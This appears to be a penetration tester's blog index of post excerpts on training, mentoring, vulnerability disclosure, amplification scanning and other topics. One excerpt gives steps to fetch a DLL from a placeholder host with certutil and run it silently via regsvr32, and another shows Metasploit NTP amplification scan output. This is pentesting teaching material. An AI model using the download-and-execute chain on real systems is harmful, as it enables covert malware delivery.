Dark Side Ops I & 2 Review

Dark Side Ops I & 2 Review

| | security bloggers network
Dark Side Ops I https://silentbreaksecurity.com/training/dark-side-ops/https://www.blackhat.com/us-17/training/dark-side-ops-custom-penetration-testing.html A really good overview of the class is here https://www.ethicalhacker.net/features/root/course-review-dark-side-ops-custom-penetration-testingI enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-) I’ll try not to cover what is in Raphael’s article as it is ... Read More

Books I’d give to my 30yr old self

|
A good friend/co-worker recently turned 30. In preparation for his birthday party I gave some thought to my 30th birthday and the things I now know or have an idea about and what I wish I had known at that point in my life. I decided to buy him a ... Read More

Mentoring: On Blogging

| | mentoring
Received the question about blogging. More specifically:How and WhyHow to benefit from bloggingHow to be consistent with postingIn my mind, the key to success and blogging is to be totally selfish in its planning and execution.Blogging is a personal activity/journey that you allow the public to be a part of ... Read More
Certutil for delivery of files

Certutil for delivery of files

| | pentesting
Quick post putting together some twitter awesomenessreferences:https://twitter.com/subtee/status/888125678872399873https://twitter.com/subTee/status/888071631528235010https://twitter.com/malwaretechblog/status/733651527827623936Let's do it1. Create your DLL2. Base64encode it (optional)3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down4. Base64decode the file with certutil5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll ... Read More
Ferris Bueller's Day Off (3/3) Movie CLIP - Oh, You Know Him? (1986) HD

Follow up to the vuln disclosure post

|
Summary of responses from this post: http://carnal0wnage.attackresearch.com/2017/06/vulnerability-disclosure-free-bug.htmlI wanted to document/summarize some of the responses I received and some of the insights I gained via self observation and my interactions with others on the topic.I received a few replies (less than I hoped for though). To summarize a few:-I'm not a ... Read More

Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard

|
Backstory:Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing ... Read More
NTP/SNMP amplification attacks

NTP/SNMP amplification attacks

| | amplification attacks
I needed to verify a SNMP and NTP amplification vulnerability was actually working. Metasploit has a few scanners for ntp vulns in the auxiliary/scanner/ntp/ntp_* and it will report hosts as being vulnerable to amplification attacks.msf auxiliary(ntp_readvar) > run[*] Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)[+] 1.1.1.1:123 - Vulnerable ... Read More
Mentoring: On meeting your **Heroes**

Mentoring: On meeting your **Heroes**

| | mentoring
Mentoring: On meeting your **Heroes**I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's quote about even the most popular infosec person is like being a famous bowler. Except for rare exceptions, no one outside of our community knows who we ... Read More
What is MapReduce?

DevOoops: Hadoop

| | devoops, DEVOPS, hadoop, pentesting
What is Hadoop?"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely ... Read More
Raspbian/Kano OS in QEMU

Raspbian/Kano OS in QEMU

Quick notesI wanted to be able to boot the Kano OS in a virtual machine so i could play hack minecraft with the kids and play along with the Kano OS desktop/games. I was trying to avoid plugging a raspberry pi into an monitor to use and wanted to use ... Read More
Loading...